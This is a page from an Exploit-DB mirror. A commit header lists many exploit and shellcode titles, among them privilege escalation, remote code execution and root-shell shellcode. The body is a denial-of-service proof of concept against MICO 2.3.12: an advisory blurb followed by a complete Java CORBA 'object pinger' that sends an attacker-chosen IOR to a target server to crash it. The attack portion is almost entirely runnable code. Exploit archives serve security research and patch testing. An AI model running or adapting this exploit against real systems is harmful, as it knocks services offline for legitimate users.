exploit-db-mirror/exploits/multiple/dos/28182.java
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

108 lines
No EOL
3.3 KiB
Java

source: https://www.securityfocus.com/bid/18869/info
MICO is susceptible to a remote denial-of-service vulnerability. This issue is due to a failure of the application to properly handle unexpected input.
This issue allows remote attackers to crash affected applications, denying further service to legitimate users.
MICO versions 2.3.12RC3 and 2.3.12 are vulnerable to this issue; other versions may also be affected.
// $Id: JPing.java 8 2006-07-02 09:35:47Z tuergeist $
public class JPing {
static String[] myArgs;
private static void showHelp() {
System.err.println("YAOP - Yet another object pinger v0.1\n a JacORB pingo clone");
System.err.println("Usage: java JPing -p <IOR> [<TypeID>]");
System.err.println("Options:");
System.err.println("\t -p <IOR> \n\t\t pings an CORBA object" +
"\n\t\tYou can also use corbaloc instead of stringified IORs\n" +
"\t\te.g. corbaloc::127.0.0.1:1234/foobarfoofoo \n" +
"\t\tTypeID is optional e.g. IDL:Hello:1.0\n");
System.exit( 1 );
}
public static String[] getMyArgs() {
return myArgs;
}
public static void setMyArgs(String[] mArgs) {
myArgs = mArgs;
}
public static void main(String[] args) {
setMyArgs( args );
if( args.length<2 || args.length > 5 )
{
showHelp();
}
if (args[0].equalsIgnoreCase("-p")) {
pingObject();
return;
}
showHelp();
}
static void pingObject () {
String[] args = getMyArgs();
String type = new String();
org.omg.CORBA.ORB orb = org.omg.CORBA.ORB.init(args,null);
org.omg.CORBA.Object o= null;
String iorString = null;
if( args.length < 2 || args.length > 3)
{
showHelp();
}
iorString = args[1];
if (args.length==3) {
type = new String(args[2]); // TypeID
}
System.out.print("orb.string_to_object \t\t ... ");
try {
o = orb.string_to_object( iorString );
}
catch (Exception e) {
System.err.println("Exception caught; " + e.toString());
System.exit(1);
}
if( o == null )
{
System.err.println("Could not convert " + iorString + " to an object");
}
else
{
System.out.println("ok");
System.out.print("Object exists? " );
try
{
boolean exists = !o._non_existent();
System.out.println("\t\t\t ... " + exists);
if(exists && type.length()>8) {
System.out.print("Object is_a("+type+")");
System.out.println("\t ... " + o._is_a( type ) );
}
}
catch (org.omg.CORBA.OBJECT_NOT_EXIST e)
{
System.err.println("\t ... no!\n" + e );
}
catch (org.omg.CORBA.OBJ_ADAPTER e)
{
System.err.println("\nAdapter error!\n\n" + e );
}
catch (Exception e) {
System.err.println("Exception caught; " + e.toString());
}
/*
catch (org.omg.CORBA.SystemException e)
{
System.err.println("\nSystem Exception!\n\n" + e );
}
*/
}
return;
}
}